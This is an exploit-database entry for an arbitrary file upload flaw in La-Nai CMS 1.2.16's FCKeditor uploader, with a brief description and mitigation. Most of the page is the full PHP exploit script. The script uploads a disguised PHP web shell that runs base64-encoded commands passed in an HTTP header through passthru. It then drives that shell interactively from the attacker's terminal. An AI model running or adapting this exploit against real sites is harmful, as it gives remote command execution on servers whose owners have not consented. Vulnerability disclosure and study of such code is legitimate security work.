La-Nai CMS - exploit.company

vendor:

La-Nai CMS

by:

EgiX

7.5

CVSS

HIGH

Arbitrary File Upload

CWE

Product Name: La-Nai CMS

Affected Version From: <= 1.2.16

Affected Version To: <= 1.2.16

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit

The vulnerability exists in the /include/fckeditor/editor/filemanager/upload/php/upload.php file of La-Nai CMS version 1.2.16. The code allows an attacker to upload arbitrary files to the server. The file name and extension are obtained from the uploaded file, and the file type is checked against allowed types. However, the check can be bypassed by modifying the 'Type' parameter. This allows an attacker to upload any file, regardless of its extension or type. The uploaded file is saved in the target directory, which can be specified in the configuration file. This can lead to remote code execution or unauthorized access to sensitive information.

Mitigation:

Update to a patched version of La-Nai CMS or implement proper input validation and file type checking in the upload.php file.

Source

Exploit-DB raw data:

<?php

/*
	--------------------------------------------------------------
	La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
	--------------------------------------------------------------
	
	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	
	link.....: http://sourceforge.net/projects/la-nai/

	[-] vulnerable code in /include/fckeditor/editor/filemanager/upload/php/upload.php
	
	41.	// Get the posted file.
	42.	$oFile = $_FILES['NewFile'] ;
	43.	
	44.	// Get the uploaded file name and extension.
	45.	$sFileName = $oFile['name'] ;
	46.	$sOriginalFileName = $sFileName ;
	47.	$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
	48.	$sExtension = strtolower( $sExtension ) ;
	49.	
	50.	// The the file type (from the QueryString, by default 'File').
	51.	$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
	52.	
	53.	// Check if it is an allowed type.
	54.	if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
	55.	    SendResults( 1, '', '', 'Invalid type specified' ) ;
	56.	
	57.	// Get the allowed and denied extensions arrays.
	58.	$arAllowed	= $Config['AllowedExtensions'][$sType] ;
	59.	$arDenied	= $Config['DeniedExtensions'][$sType] ;
	60.	
	61.	// Check if it is an allowed extension.
	62.	if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
	63.		SendResults( '202' ) ;
	64.	
	65.	$sErrorNumber	= '0' ;
	66.	$sFileUrl		= '' ;
	67.	
	68.	// Initializes the counter used to rename the file, if another one with the same name already exists.
	69.	$iCounter = 0 ;
	70.	
	71.	// The the target directory.
	72.	if ( isset( $Config['UserFilesAbsolutePath'] ) )
	73.		$sServerDir = $Config['UserFilesAbsolutePath'] ;
	74.	else 
	75.		//$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
	76.		$sServerDir = $Config["UserFilesPath"] ;
	77.	
	78.	while ( true )
	79.	{
	80.		// Compose the file path.
	81.		$sFilePath = $sServerDir . $sFileName ;
	82.	
	83.		// If a file with that name already exists.
	84.		if ( is_file( $sFilePath ) )
	85.		{
	86.			$iCounter++ ;
	87.			$sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
	88.			$sErrorNumber = '201' ;
	89.		}
	90.		else
	91.		{
	92.			move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
	93.	
	94.			if ( is_file( $sFilePath ) )
	95.			{
	96.				$oldumask = umask(0) ;
	97.				chmod( $sFilePath, 0777 ) ;
	98.				umask( $oldumask ) ;
	99.			}
	100.			
	101.			$sFileUrl = $Config["UserFilesPath"] . $sFileName ;
	102.	
	103.			break ;
	104.		}
	
	with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code	
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)
	{
		print "\n[-] No response from {$host}:80 Trying again...";
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	return $resp;
}

print "\n+------------------------------------------------------------+";
print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";

if ($argc < 2)
{
	print "\nUsage......: php $argv[0] host path";
	print "\nExample....: php $argv[0] localhost /lanai-cms/\n";
	die();
}

$host = $argv[1];
$path = $argv[2];

$data  = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";

$packet  = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";

define(STDIN, fopen("php://stdin", "r"));

while(1)
{
	print "\nlanai-shell# ";
	$cmd = trim(fgets(STDIN));
	if ($cmd != "exit")
	{
		$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
		$packet.= "Host: {$host}\r\n";
		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
		$packet.= "Connection: close\r\n\r\n";
		$output = http_send($host, $packet);
		if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
		$shell = explode("_code_", $output);
		print "\n{$shell[1]}";
	}
	else break;
}

?>

# milw0rm.com [2008-05-14]